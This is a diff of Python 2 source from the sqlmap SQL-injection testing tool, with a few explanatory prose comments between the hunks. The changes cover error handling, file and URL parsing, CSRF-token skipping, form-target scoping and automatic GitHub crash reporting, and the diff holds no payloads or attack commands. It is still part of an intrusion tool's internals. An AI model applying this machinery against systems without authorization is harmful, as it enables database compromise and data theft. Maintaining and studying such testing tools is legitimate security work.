@@ -9,8 +9,11 @@ import codecs
import contextlib
import cookielib
import copy
import getpass
import hashlib
import httplib
import inspect
import json
import logging
import ntpath
import os

@@ -23,6 +26,7 @@ import sys
import tempfile
import time
import urllib
import urllib2
import urlparse
import unicodedata

@@ -71,12 +75,12 @@ from lib.core.enums import PAYLOAD
from lib.core.enums import REFLECTIVE_COUNTER
from lib.core.enums import SORT_ORDER
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapSystemException
from lib.core.exception import SqlmapUserQuitException
from lib.core.log import LOGGER_HANDLER
from lib.core.optiondict import optDict

@@ -98,6 +102,8 @@ from lib.core.settings import ERROR_PARSING_REGEXES
from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
from lib.core.settings import FORM_SEARCH_REGEX
from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
from lib.core.settings import GIT_PAGE
from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN
from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
from lib.core.settings import HASHDB_MILESTONE_VALUE
from lib.core.settings import HOST_ALIASES
@@ -551,6 +557,9 @@ def paramToDict(place, parameters=None):
        if len(parts) >= 2:
            parameter = urldecode(parts[0].replace(" ", ""))

            if not parameter:
                continue

            if conf.paramDel and conf.paramDel == '\n':
                parts[-1] = parts[-1].rstrip()

@@ -560,7 +569,7 @@ def paramToDict(place, parameters=None):

            if condition:
                testableParameters[parameter] = "=".join(parts[1:])
                if not conf.multipleTargets:
                if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken):
                    _ = urldecode(testableParameters[parameter], convall=True)
                    if (_.strip(DUMMY_SQL_INJECTION_CHARS) != _\
                        or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\

@@ -839,7 +848,7 @@ def dataToTrafficFile(data):
    except IOError, ex:
        errMsg = "something went wrong while trying "
        errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, ex)
        raise SqlmapGenericException(errMsg)
        raise SqlmapSystemException(errMsg)

def dataToDumpFile(dumpFile, data):
    dumpFile.write(data)
@@ -851,8 +860,13 @@ def dataToOutFile(filename, data):
    if data:
        retVal = os.path.join(conf.filePath, filePathToSafeString(filename))

        with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
            f.write(data)
        try:
            with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
                f.write(data)
        except IOError, ex:
            errMsg = "something went wrong while trying to write "
            errMsg += "to the output file ('%s')" % ex
            raise SqlmapGenericException(errMsg)

    return retVal

@@ -875,7 +889,7 @@ def readInput(message, default=None, checkBatch=True):
        message = "\n%s" % message
        kb.prependFlag = False

    if conf.answers:
    if conf.get("answers"):
        for item in conf.answers.split(','):
            question = item.split('=')[0].strip()
            answer = item.split('=')[1] if len(item.split('=')) > 1 else None

@@ -891,7 +905,7 @@ def readInput(message, default=None, checkBatch=True):
            break

    if retVal is None:
        if checkBatch and conf.batch:
        if checkBatch and conf.get("batch"):
            if isListLike(default):
                options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default)
            elif default:

@@ -912,7 +926,7 @@ def readInput(message, default=None, checkBatch=True):

            try:
                retVal = raw_input() or default
                retVal = getUnicode(retVal, system=True) if retVal else retVal
                retVal = getUnicode(retVal, encoding=sys.stdin.encoding) if retVal else retVal
            except:
                time.sleep(0.05) # Reference: http://www.gossamer-threads.com/lists/python/python/781893
                kb.prependFlag = True
@@ -981,11 +995,23 @@ def sanitizeStr(value):

def checkFile(filename):
    """
    Checks for file existence
    Checks for file existence and readability
    """

    if not os.path.isfile(filename):
        raise SqlmapFilePathException("unable to read file '%s'" % filename)
    valid = True

    if filename is None or not os.path.isfile(filename):
        valid = False

    if valid:
        try:
            with open(filename, "rb") as f:
                pass
        except:
            valid = False

    if not valid:
        raise SqlmapSystemException("unable to read file '%s'" % filename)

def banner():
    """
@@ -1053,14 +1079,15 @@ def setPaths():
    paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")

    _ = os.path.join(os.path.expanduser("~"), ".sqlmap")
    paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), system=True)
    paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
    paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
    paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")

    # sqlmap files
    paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
    paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
    paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
    paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
    paths.GITHUB_HISTORY = os.path.join(_, "github.hst")
    paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
    paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
    paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")

@@ -1071,7 +1098,6 @@ def setPaths():
    paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
    paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
    paths.PAYLOADS_XML = os.path.join(paths.SQLMAP_XML_PATH, "payloads.xml")
    paths.INJECTIONS_XML = os.path.join(paths.SQLMAP_XML_PATH, "injections.xml")
    paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
    paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
    paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")

@@ -1080,6 +1106,10 @@ def setPaths():
    paths.ORACLE_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
    paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")

    for path in paths.values():
        if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")):
            checkFile(path)

def weAreFrozen():
    """
    Returns whether we are frozen via py2exe.
@@ -1210,7 +1240,14 @@ def parseTargetUrl():
    if CUSTOM_INJECTION_MARK_CHAR in conf.url:
        conf.url = conf.url.replace('?', URI_QUESTION_MARKER)

    urlSplit = urlparse.urlsplit(conf.url)
    try:
        urlSplit = urlparse.urlsplit(conf.url)
    except ValueError, ex:
        errMsg = "invalid URL '%s' has been given ('%s'). " % (conf.url, ex)
        errMsg += "Please be sure that you don't have any leftover characters (e.g. '[' or ']') "
        errMsg += "in the hostname part"
        raise SqlmapGenericException(errMsg)

    hostnamePort = urlSplit.netloc.split(":") if not re.search("\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search("\](:(?P<port>\d+))?", urlSplit.netloc).group("port")))

    conf.scheme = urlSplit.scheme.strip().lower() if not conf.forceSSL else "https"

@@ -1281,7 +1318,7 @@ def expandAsteriskForColumns(expression):
        if expression != conf.query:
            conf.db = db
        else:
            expression = re.sub(r"([^\w])%s" % conf.tbl, "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
            expression = re.sub(r"([^\w])%s" % re.escape(conf.tbl), "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
    else:
        conf.db = db
    conf.db = safeSQLIdentificatorNaming(conf.db)
@@ -1519,29 +1556,30 @@ def safeStringFormat(format_, params):

    if format_.count(PAYLOAD_DELIMITER) == 2:
        _ = format_.split(PAYLOAD_DELIMITER)
        _[1] = _[1].replace("%d", "%s")
        _[1] = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", _[1])
        retVal = PAYLOAD_DELIMITER.join(_)
    else:
        retVal = format_.replace("%d", "%s")
        retVal = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", format_)

    if isinstance(params, basestring):
        retVal = retVal.replace("%s", params, 1)
    elif not isListLike(params):
        retVal = retVal.replace("%s", str(params), 1)
    else:
        count, index = 0, 0
        if retVal.count("%s") == len(params):
            while index != -1:
                index = retVal.find("%s")
                if index != -1:
                    retVal = retVal[:index] + getUnicode(params[count]) + retVal[index + 2:]
                    count += 1
        start, end = 0, len(retVal)
        match = re.search(r"%s(.+)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), retVal)
        if match and PAYLOAD_DELIMITER not in match.group(1):
            start, end = match.start(), match.end()
        if retVal.count("%s", start, end) == len(params):
            for param in params:
                index = retVal.find("%s", start)
                retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:]
        else:
            count = 0
            while True:
                match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
                if match:
                    if count > len(params):
                    if count >= len(params):
                        raise Exception("wrong number of parameters during string formatting")
                    else:
                        retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1)
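The boundary-aware substitution above replaces a %d placeholder only when it is not embedded in a longer token, restoring the surrounding characters through \g<1> and \g<3>. A small hedged example of the same re.sub pattern on a made-up format string:

    import re

    fmt = "SELECT %d FROM t WHERE x='%dummy' LIMIT %d"
    # Replace bare %d placeholders with %s, but leave '%dummy' alone because the
    # character after that %d is a letter, so the boundary group does not match.
    converted = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", fmt)
    print(converted)  # SELECT %s FROM t WHERE x='%dummy' LIMIT %s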
@@ -1679,7 +1717,11 @@ def getConsoleWidth(default=80):
        width = int(os.getenv("COLUMNS"))
    else:
        try:
            process = execute("stty size", shell=True, stdout=PIPE, stderr=PIPE)
            try:
                FNULL = open(os.devnull, 'w')
            except IOError:
                FNULL = None
            process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL or PIPE)
            stdout, _ = process.communicate()
            items = stdout.split()
@@ -1862,31 +1904,36 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un

    checkFile(filename)

    with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
        for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used
            if commentPrefix:
                if line.find(commentPrefix) != -1:
                    line = line[:line.find(commentPrefix)]
    try:
        with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
            for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used
                if commentPrefix:
                    if line.find(commentPrefix) != -1:
                        line = line[:line.find(commentPrefix)]

                line = line.strip()
                line = line.strip()

                if not unicode_:
                    try:
                        line = str.encode(line)
                    except UnicodeDecodeError:
                        continue
                if not unicode_:
                    try:
                        line = str.encode(line)
                    except UnicodeDecodeError:
                        continue

                if line:
                    if lowercase:
                        line = line.lower()
                if line:
                    if lowercase:
                        line = line.lower()

                    if unique and line in retVal:
                        continue
                    if unique and line in retVal:
                        continue

                    if unique:
                        retVal[line] = True
                    else:
                        retVal.append(line)
                    if unique:
                        retVal[line] = True
                    else:
                        retVal.append(line)
    except (IOError, OSError, MemoryError), ex:
        errMsg = "something went wrong while trying "
        errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)
        raise SqlmapSystemException(errMsg)

    return retVal if not unique else retVal.keys()
@@ -1995,7 +2042,7 @@ def getPartRun(alias=True):
    else:
        return retVal

def getUnicode(value, encoding=None, system=False, noneToNull=False):
def getUnicode(value, encoding=None, noneToNull=False):
    """
    Return the unicode representation of the supplied value:

@@ -2011,28 +2058,22 @@ def getUnicode(value, encoding=None, system=False, noneToNull=False):
        return NULL

    if isListLike(value):
        value = list(getUnicode(_, encoding, system, noneToNull) for _ in value)
        value = list(getUnicode(_, encoding, noneToNull) for _ in value)
        return value

    if not system:
        if isinstance(value, unicode):
            return value
        elif isinstance(value, basestring):
            while True:
                try:
                    return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
                except UnicodeDecodeError, ex:
                    value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
        else:
    if isinstance(value, unicode):
        return value
    elif isinstance(value, basestring):
        while True:
            try:
                return unicode(value)
            except UnicodeDecodeError:
                return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances
                return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
            except UnicodeDecodeError, ex:
                value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
    else:
        try:
            return getUnicode(value, sys.getfilesystemencoding() or sys.stdin.encoding)
        except:
            return getUnicode(value, UNICODE_ENCODING)
            return unicode(value)
        except UnicodeDecodeError:
            return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances

def longestCommonPrefix(*sequences):
    """
@@ -2498,11 +2539,11 @@ def removeDynamicContent(page):
            if prefix is None and suffix is None:
                continue
            elif prefix is None:
                page = re.sub(r'(?s)^.+%s' % suffix, suffix, page)
                page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix, page)
            elif suffix is None:
                page = re.sub(r'(?s)%s.+$' % prefix, prefix, page)
                page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix, page)
            else:
                page = re.sub(r'(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page)
                page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix, suffix), page)

    return page
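The re.escape() calls added above matter because the detected dynamic-content markers are arbitrary page fragments; if they contain regex metacharacters, the unescaped pattern would match something else entirely, or fail to compile. A short illustration with made-up markers:

    import re

    prefix, suffix = "<b>(hits)</b>", "<i>[end]</i>"          # made-up markers containing ( ) [ ]
    page = "<b>(hits)</b> 133742 <i>[end]</i> static footer"

    # Without re.escape the parentheses/brackets would be treated as regex syntax;
    # with it, the dynamic part between the markers is collapsed reliably.
    cleaned = re.sub(r"(?s)%s.+%s" % (re.escape(prefix), re.escape(suffix)), "%s%s" % (prefix, suffix), page)
    print(cleaned)  # <b>(hits)</b><i>[end]</i> static footer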
@@ -2793,7 +2834,7 @@ def openFile(filename, mode='r'):
        errMsg += "Please check %s permissions on a file " % ("write" if \
            mode and ('w' in mode or 'a' in mode or '+' in mode) else "read")
        errMsg += "and that it's not locked by another process."
        raise SqlmapFilePathException(errMsg)
        raise SqlmapSystemException(errMsg)

def decodeIntToUnicode(value):
    """
@@ -2808,14 +2849,11 @@ def decodeIntToUnicode(value):

    if isinstance(value, int):
        try:
            # http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_ord
            if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
                if value > 255:
                    _ = "%x" % value
                    if len(_) % 2 == 1:
                        _ = "0%s" % _
                    retVal = getUnicode(hexdecode(_))
                elif value > 255:
                    retVal = unichr(value)
                    retVal = getUnicode(hexdecode(_), encoding="UTF-16" if Backend.isDbms(DBMS.MSSQL) else None)
                else:
                    retVal = getUnicode(chr(value))
        except:
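For the MySQL branch above: ORD() on a multi-byte character returns an integer built from the character's encoded bytes, so the value is rendered as zero-padded, even-length hex and decoded back to bytes. A hedged illustration of that arithmetic in plain Python:

    import codecs

    # MySQL ORD('€') over a UTF-8 connection returns 14844588 (0xE282AC),
    # i.e. an integer assembled from the character's UTF-8 bytes.
    value = 14844588
    _ = "%x" % value                     # 'e282ac'
    if len(_) % 2 == 1:                  # pad to an even number of hex digits
        _ = "0%s" % _
    raw = codecs.decode(_, "hex")        # the original bytes: \xe2\x82\xac
    print(raw.decode("utf8"))            # recovers the character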
@@ -2828,21 +2866,81 @@ def unhandledExceptionMessage():
    Returns detailed message about occurred unhandled exception
    """

    errMsg = "unhandled exception in %s, retry your " % VERSION_STRING
    errMsg += "run with the latest development version from the GitHub "
    errMsg += "repository. If the exception persists, please send by e-mail "
    errMsg += "to '%s' or open a new issue at '%s' with the following text " % (ML, ISSUES_PAGE)
    errMsg += "and any information required to reproduce the bug. The "
    errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING
    errMsg += "run with the latest development version from official GitHub "
    errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE
    errMsg += "at '%s' (or less preferably send by e-mail to '%s') " % (ISSUES_PAGE, ML)
    errMsg += "with the following text and any other information required to "
    errMsg += "reproduce the bug. The "
    errMsg += "developers will try to reproduce the bug, fix it accordingly "
    errMsg += "and get back to you.\n"
    errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "")
    errMsg += "and get back to you\n"
    errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:]
    errMsg += "Python version: %s\n" % PYVERSION
    errMsg += "Operating system: %s\n" % PLATFORM
    errMsg += "Command line: %s\n" % " ".join(sys.argv)
    errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", " ".join(sys.argv))
    errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
    errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())

    return maskSensitiveData(errMsg)
    return errMsg

def createGithubIssue(errMsg, excMsg):
    """
    Automatically create a Github issue with unhandled exception information
    """

    issues = []
    try:
        issues = getFileItems(paths.GITHUB_HISTORY, unique=True)
    except:
        pass
    finally:
        issues = set(issues)

    _ = re.sub(r"'[^']+'", "''", excMsg)
    _ = re.sub(r"\s+line \d+", "", _)
    _ = re.sub(r'File ".+?/(\w+\.py)', "\g<1>", _)
    key = hashlib.md5(_).hexdigest()[:8]

    if key in issues:
        return

    msg = "\ndo you want to automatically create a new (anonymized) issue "
    msg += "with the unhandled exception information at "
    msg += "the official Github repository? [y/N] "
    try:
        test = readInput(msg, default="N")
    except:
        test = None

    if test and test[0] in ("y", "Y"):
        ex = None
        errMsg = errMsg[errMsg.find("\n"):]

        data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
        req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN})

        try:
            f = urllib2.urlopen(req)
            content = f.read()
        except Exception, ex:
            content = None

        issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "")
        if issueUrl:
            infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0)
            logger.info(infoMsg)

            try:
                with open(paths.GITHUB_HISTORY, "a+b") as f:
                    f.write("%s\n" % key)
            except:
                pass
        else:
            warnMsg = "something went wrong while creating a Github issue"
            if ex:
                warnMsg += " ('%s')" % ex
            logger.warn(warnMsg)

def maskSensitiveData(msg):
    """
@@ -2857,6 +2955,15 @@ def maskSensitiveData(msg):
        value = extractRegexResult(regex, retVal)
        retVal = retVal.replace(value, '*' * len(value))

    if not conf.get("hostname"):
        match = re.search(r"(?i)sqlmap.+(-u|--url)\s+([^ ]+)", retVal)
        if match:
            retVal = retVal.replace(match.group(2), '*' * len(match.group(2)))

    if getpass.getuser():
        retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal)

    return retVal

def listToStrValue(value):
@@ -2931,7 +3038,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):

    retVal = content

    if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism:
    if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
        def _(value):
            while 2 * REFLECTED_REPLACEMENT_REGEX in value:
                value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)

@@ -2966,7 +3073,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
                regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
                retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)

        if retVal != content and not kb.heuristicMode:
        if retVal != content:
            kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
            if not suppressWarning:
                warnMsg = "reflective value(s) found and filtering out"
@@ -3392,8 +3499,17 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
                logger.debug(debugMsg)
                continue

            target = (url, method, data, conf.cookie)
            retVal.add(target)
            # flag to know if we are dealing with the same target host
            _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))

            if conf.scope:
                if not re.search(conf.scope, url, re.I):
                    continue
            elif not _:
                continue
            else:
                target = (url, method, data, conf.cookie, None)
                retVal.add(target)
    else:
        errMsg = "there were no forms found at the given target URL"
        if raise_:

@@ -3403,17 +3519,6 @@ def findPageForms(content, url, raise_=False, addToTargets=False):

    if addToTargets and retVal:
        for target in retVal:
            url = target[0]

            # flag to know if we are dealing with the same target host
            _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))

            if conf.scope:
                if not re.search(conf.scope, url, re.I):
                    continue
            elif not _:
                continue

            kb.targets.add(target)

    return retVal
@@ -41,6 +41,7 @@ def base64pickle(value):
    """

    retVal = None

    try:
        retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
    except:
@@ -63,7 +64,14 @@ def base64unpickle(value):
    'foobar'
    """

    return pickle.loads(base64decode(value))
    retVal = None

    try:
        retVal = pickle.loads(base64decode(value))
    except TypeError:
        retVal = pickle.loads(base64decode(bytes(value)))

    return retVal

def hexdecode(value):
    """
@@ -207,6 +207,7 @@ POST_HINT_CONTENT_TYPES = {
POST_HINT.MULTIPART: "multipart/form-data",
POST_HINT.SOAP: "application/soap+xml",
POST_HINT.XML: "application/xml",
POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
}

DEPRECATED_OPTIONS = {

@@ -66,13 +66,24 @@ class Dump(object):
if kb.get("multiThreadMode"):
self._lock.acquire()

self._outputFP.write(text)
try:
self._outputFP.write(text)
except IOError, ex:
errMsg = "error occurred while writing to log file ('%s')" % ex
raise SqlmapGenericException(errMsg)

if kb.get("multiThreadMode"):
self._lock.release()

kb.dataOutputFlag = True

def flush(self):
if self._outputFP:
try:
self._outputFP.flush()
except IOError:
pass

def setOutputFile(self):
self._outputFile = os.path.join(conf.outputPath, "log")
try:
@@ -380,7 +391,7 @@ class Dump(object):
self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
return

dumpDbPath = os.path.join(conf.dumpPath, re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
dumpDbPath = os.path.join(conf.dumpPath, re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db))))

if conf.dumpFormat == DUMP_FORMAT.SQLITE:
replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
@@ -388,7 +399,7 @@ class Dump(object):
if not os.path.isdir(dumpDbPath):
os.makedirs(dumpDbPath, 0755)

dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (normalizeUnicode(unsafeSQLIdentificatorNaming(table)), conf.dumpFormat.lower()))
appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")

@@ -74,6 +74,7 @@ class POST_HINT:
JSON_LIKE = "JSON-like"
MULTIPART = "MULTIPART"
XML = "XML (generic)"
ARRAY_LIKE = "Array-like"

class HTTPMETHOD:
GET = "GET"

@@ -23,6 +23,9 @@ class SqlmapFilePathException(SqlmapBaseException):
class SqlmapGenericException(SqlmapBaseException):
pass

class SqlmapInstallationException(SqlmapBaseException):
pass

class SqlmapMissingDependence(SqlmapBaseException):
pass

@@ -50,9 +53,15 @@ class SqlmapShellQuitException(SqlmapBaseException):
class SqlmapSyntaxException(SqlmapBaseException):
pass

class SqlmapSystemException(SqlmapBaseException):
pass

class SqlmapThreadException(SqlmapBaseException):
pass

class SqlmapTokenException(SqlmapBaseException):
pass

class SqlmapUndefinedMethod(SqlmapBaseException):
pass

@ -84,11 +84,13 @@ from lib.core.enums import WIZARD
|
|||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapFilePathException
|
||||
from lib.core.exception import SqlmapGenericException
|
||||
from lib.core.exception import SqlmapInstallationException
|
||||
from lib.core.exception import SqlmapMissingDependence
|
||||
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
||||
from lib.core.exception import SqlmapMissingPrivileges
|
||||
from lib.core.exception import SqlmapSilentQuitException
|
||||
from lib.core.exception import SqlmapSyntaxException
|
||||
from lib.core.exception import SqlmapSystemException
|
||||
from lib.core.exception import SqlmapUnsupportedDBMSException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.log import FORMATTER
|
||||
|
@ -106,6 +108,7 @@ from lib.core.settings import DUMMY_URL
|
|||
from lib.core.settings import INJECT_HERE_MARK
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
|
||||
from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
|
||||
from lib.core.settings import LOCALHOST
|
||||
from lib.core.settings import MAX_CONNECT_RETRIES
|
||||
from lib.core.settings import MAX_NUMBER_OF_THREADS
|
||||
|
@ -219,7 +222,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
|
||||
if not(conf.scope and not re.search(conf.scope, url, re.I)):
|
||||
if not kb.targets or url not in addedTargetUrls:
|
||||
kb.targets.add((url, method, None, cookie))
|
||||
kb.targets.add((url, method, None, cookie, None))
|
||||
addedTargetUrls.add(url)
|
||||
|
||||
def _parseBurpLog(content):
|
||||
|
@ -233,7 +236,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
|
||||
port, request = match.groups()
|
||||
request = request.decode("base64")
|
||||
_ = re.search(r"%s:.+" % HTTP_HEADER.HOST, request)
|
||||
_ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request)
|
||||
if _:
|
||||
host = _.group(0).strip()
|
||||
if not re.search(r":\d+\Z", host):
|
||||
|
@ -271,6 +274,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
params = False
|
||||
newline = None
|
||||
lines = request.split('\n')
|
||||
headers = []
|
||||
|
||||
for index in xrange(len(lines)):
|
||||
line = lines[index]
|
||||
|
@ -282,7 +286,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
line = line.strip('\r')
|
||||
match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
|
||||
|
||||
if len(line) == 0 and method in (HTTPMETHOD.POST, HTTPMETHOD.PUT) and data is None:
|
||||
if len(line) == 0 and method and method != HTTPMETHOD.GET and data is None:
|
||||
data = ""
|
||||
params = True
|
||||
|
||||
|
@ -320,14 +324,14 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
port = filterStringValue(splitValue[1], "[0-9]")
|
||||
|
||||
# Avoid to add a static content length header to
|
||||
# conf.httpHeaders and consider the following lines as
|
||||
# headers and consider the following lines as
|
||||
# POSTed data
|
||||
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
|
||||
params = True
|
||||
|
||||
# Avoid proxy and connection type related headers
|
||||
elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
|
||||
conf.httpHeaders.append((getUnicode(key), getUnicode(value)))
|
||||
headers.append((getUnicode(key), getUnicode(value)))
|
||||
|
||||
if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
|
||||
params = True
|
||||
|
@ -355,12 +359,17 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
|||
|
||||
if not(conf.scope and not re.search(conf.scope, url, re.I)):
|
||||
if not kb.targets or url not in addedTargetUrls:
|
||||
kb.targets.add((url, method, data, cookie))
|
||||
kb.targets.add((url, method, data, cookie, tuple(headers)))
|
||||
addedTargetUrls.add(url)
|
||||
|
||||
fp = openFile(reqFile, "rb")
|
||||
|
||||
content = fp.read()
|
||||
checkFile(reqFile)
|
||||
try:
|
||||
with openFile(reqFile, "rb") as f:
|
||||
content = f.read()
|
||||
except (IOError, OSError, MemoryError), ex:
|
||||
errMsg = "something went wrong while trying "
|
||||
errMsg += "to read the content of file '%s' ('%s')" % (reqFile, ex)
|
||||
raise SqlmapSystemException(errMsg)
|
||||
|
||||
